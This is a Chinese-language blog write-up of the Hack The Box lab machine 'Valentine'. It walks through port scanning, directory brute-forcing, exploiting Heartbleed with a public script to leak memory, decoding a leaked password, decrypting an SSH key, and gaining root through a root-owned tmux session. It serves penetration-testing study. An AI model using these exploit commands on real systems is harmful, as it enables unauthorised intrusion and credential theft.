【Hack The Box】linux练习-- Valentine
HTB 学习笔记
【Hack The Box】linux练习-- Valentine
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月10日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 964c51423cba2249204d3eec90ccfd0e (DSA)
| 2048 46bf1fcc924f1da042b3d216a8583133 (RSA)
|_ 256 e62b2519cb7e54cb0ab9ac1698c67da9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
只有一个http或者https应该会有信息泄漏
进行一下目录爆破
主要扫一下php,txt
在http扫到了dev目录
有一个hex编码的文件,解密之后如下是一个加密的rs密钥文件
那么接下来就是要找到这个rsa文件的密码,也可能爆破,但是爆破我们放在最后
继续枚举https的目录
发现了如下的两个加解密php文件
但是我们没有任何的密文
这个时候要漏扫一下,nikto或者nmap
nmap --script vuln 10.129.1.254
发现心脏滴血漏洞
这个漏洞比较高威
我们可以获得内存信息
利用方法
python 32764.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
00有16个,是去掉空行的意思
发现base64编码如下
aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
放入发现的解码PHP
得到密码 heartbleedbelievethehype
这个密码可能是密钥的,也可能是ssh的
而用户名
刚才扫出来的就是hype
没有确切的根据
但不就是那句话么
try hard
如下将加密密钥转变为正常密钥
openssl rsa -in id_rsa -out id1_rsa
ssh -i valentine_key hype@10.10.10.79
提权
可以直接脏牛
单这里用个别的方法
注意看用户目录下的 .bash_history
如果不是0字节,就打开看看
发现了这个tmux,(最上面的最先执行)它先是直接执行,然后应该是错了,然后就点开帮助,然后执行了
我们照猫画虎
提权成功
tmux -S /.devs/dev_sess
这种情况呢我们不需要什么验证,可以的执行过的命令,直接执行即可,应试技巧
ps -ef | grep tmux
虽然我们知道tmux是一种套接字协议,并且审查了他的进程发现以root运行,但是直接干就完事了
相关文章
- Linux进程管理(第二版) --进程管理命令
- Linux常用命令(第二版) --网络通信命令
- 【Hack The Box】linux练习-- Writer
- 【Hack The Box】Linux练习-- Shibboleth
- 【Hack The Box】Linux练习-- Forge
- 【Hack The Box】linux练习-- Passage
- 【Hack The Box】linux练习-- SneakyMailer
- 【Hack The Box】linux练习-- Tabby
- 【Hack The Box】linux练习-- Blunder
- 【Hack The Box】Linux练习-- OpenAdmin
- 【Hack The Box】Linux练习-- Frolic
- 【Hack The Box】linux练习-- Haircut
- 【Hack The Box】linux练习-- Jarvis
- 【Hack The Box】linux练习-- Irked
- 【Hack The Box】linux练习-- Nibbles
- 【Hack The Box】linux练习-- Shocker
- 【Hack The Box】linux练习-- Brainfuck
- Linux--多网卡的7种Bond模式
- ARM Linux 如何--注册和触发--软中断
- 练习--LINUX进程间通信之信号SIGNAL
- 启动期间的内存管理之build_zonelists初始化备用内存域列表zonelists--Linux内存管理(十三)
- Linux分页机制之分页机制的演变--Linux内存管理(七)
- Linux CFS调度器之pick_next_task_fair选择下一个被调度的进程--Linux进程的管理与调度(二十八)
- Linux下2号进程的kthreadd--Linux进程的管理与调度(七)
- mycat中间件--linux安装mycat1.6版本